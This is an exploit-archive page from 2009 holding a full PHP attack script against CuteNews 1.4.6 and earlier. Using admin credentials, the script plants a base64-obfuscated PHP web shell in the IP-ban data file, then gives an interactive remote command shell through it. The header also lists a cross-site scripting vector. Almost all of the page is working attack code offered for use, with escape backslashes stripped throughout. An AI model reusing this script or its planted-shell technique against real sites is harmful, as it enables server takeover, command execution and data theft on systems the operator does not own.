[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)
# Published : 2009-01-08
# Author : StAkeR
# Previous Title : Fast FAQs System (Auth Bypass) SQL Injection Vulnerability
# Next Title : PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability


#!/usr/bin/php -q
<?php

/*********************************************************************
 * CuteNews <= 1.4.6 (ip ban) XSS / Remote Command Execution Exploit *
 * by athos - staker[at]hotmail[dot]it                               *
 * http://cutephp.com                                                *
 *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
 * Remote Command Execution                                          *
 *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
 * you need a super account (administrator)                          *
 * so you can write in ipban.db.php anything ;)                      *
 *                                                                   *
 * works regardless of php.ini settings! enjoy your ais              *
 * note: this vuln is a privilege escalation                         *  
 *                                                                   *
 *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*
 * Cross Site Scripting                                              *
 *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*           
 * http://[host]/[path]//index.php?mod=[Javascript Code]             *
 *********************************************************************/

error_reporting(0);

list($cli,$host,$path,$username,$password) = $argv;

if ($argc != 5) {  
    
    print "n+-------------------------------------------------------------+n";
    print "r| CuteNews <= 1.4.6 (ip ban) Remote Command Execution Exploit |n";
    print "r+-------------------------------------------------------------+n";
    print "rby athos - staker[at]hotmail[dot]it / http://cutephp.comnn";
    print "rUsage: php xpl.php [host] [path] [username] [password]nn";
    print "rhost     + localhostn";
    print "rpath     + /cutenewsn";
    print "rusername + admin usernamen";
    print "rpassword + admin passwordnn";
    exit;      
}         

exploit();

function login () {
    
    global $username,$password;
    
    $cookies .= "username={$username}; md5_password=";
    $cookies .= md5($password);
     
    return $cookies;
}    


function check_login() {
    
    global $host,$path;
    
    $auth .= login();
    
    $data .= "GET /{$path}/index.php HTTP/1.1rn";
    $data .= "Host: {$host}rn";
    $data .= "User-Agent: Lynx (textmode)rn";
    $data .= "Cookie: $auth;n";
    $data .= "Connection: closernrn";
    
    if (preg_match('/Welcome/i',$data)) {
        return true;
    }
    else {
        die("Login Failedn");
    }    
}


function exploit() {

    global $host,$path;
    
    $login  = login();
    $shell = "PD9waHAgDQpwYXNzdGhydSgkX0dFVFsnYyddKTsgDQo/Pg==";
    
    $shell = base64_decode($shell);
    $post  = "add_ip={$shell}&action=add&mod=ipban";
    
    $data .= "POST /{$path}/index.php HTTP/1.1rn";
    $data .= "Host: {$host}rn";
    $data .= "User-Agent: Lynx (textmode)rn";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
    $data .= "Cookie: $loginrn";
    $data .= "Referer: http://{$host}/{$path}/index.phprn";
    $data .= "Content-Type: application/x-www-form-urlencodedrn";
    $data .= "Content-Length: ".strlen($post)."rnrn";
    $data .= "{$post}rnrn";
           
    if (eregi('passthru',data_send($host,$data))) {
        yeat_shell();
    }
    else {
        die("Exploit Failed!n");
    }                 
}


function yeat_shell() {
    
    while (1) {
        echo "yeat[shell]~$: "; 
        $exec = stripslashes(trim(fgets(STDIN)));  
        
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("nExitedn");
        if (preg_match('/^(help|--help)$/i',$exec)) echo("nExample: uname -an");
        if (preg_match('/^(about|--about)$/i',$exec)) echo("nstaker[at]hotmail[dot]itn");
        
        print data_exec($exec);     
    }
}


function data_exec($exec) {
    
    global $host,$path;
    
    $exec = urlencode($exec);
    $data .= "GET /{$path}/data/ipban.db.php?c={$exec} HTTP/1.1rn";
    $data .= "Host: {$host}rn";
    $data .= "User-Agent: Lynx (textmode)rn";
    $data .= "Connection: closernrn";
    
    $html = data_send ($host,$data);
    $html = str_replace('|0||',null,$html);
    return $html;
}


function data_send ($host,$data) {
   
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused,try again!n");
    }   fputs($sock,$data);
    
    while (!feof($sock)) { $html .= fgets($sock); }
    
    fclose($sock);
    return $html;
}   

# www.Syue.com [2009-01-08]